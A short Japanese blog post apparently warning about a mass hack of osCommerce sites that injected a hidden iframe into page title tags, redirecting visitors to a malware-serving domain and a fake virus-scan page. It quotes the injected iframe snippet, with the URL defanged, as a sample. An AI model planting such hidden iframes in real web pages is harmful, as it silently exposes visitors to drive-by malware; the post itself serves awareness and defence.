iframeサイト改ざん「willysy com images banners」ウイルス配信

iframeサイト改ざん「willysy com images banners」ウイルス配信

osCommerceを利用してる一般サイトで起こってる規模大きめっぽい正規サイト改ざん被害！

タイトルタグ部分に不正な<iframe>タグが挿入されるもので、日本語表記の一般サイトも十数件ほどやられてる感じ…？

Java、Adobe Reader、IEブラウザの旧バージョンに存在する既知の脆弱性を悪用してウイルスを強制的にインストールさせるドライブバイ・ダウンロード攻撃が行われるとのこと。

・ willysy.com Mass Injection ongoing, targets osCommerce sites （Armorize Malware Blog）

<title>■■■■■<iframe src＝'http // willysy[.]com/ images/ banners/' style='position:absolute;visibility:hidden'><／iframe></title>

手元で飛び先にアクセスしてみたけれど、何回かリダイレクト転送されて最終的に偽ウイルスキャンを行うページへ飛ばされました。

ドライブバイ・ダウンロード攻撃の対策は大丈夫？

これはドライブバイ・ダウンロード攻撃ではなく、ユーザーの手動でウイルスを起動（自爆）させる手口だけれど、恐らくIPアドレスなどから地域（国）をチェックして、いろいろな攻撃パターンが用意されてるんかいな？

・ ウェブサイトのURLスキャンでウイルスチェック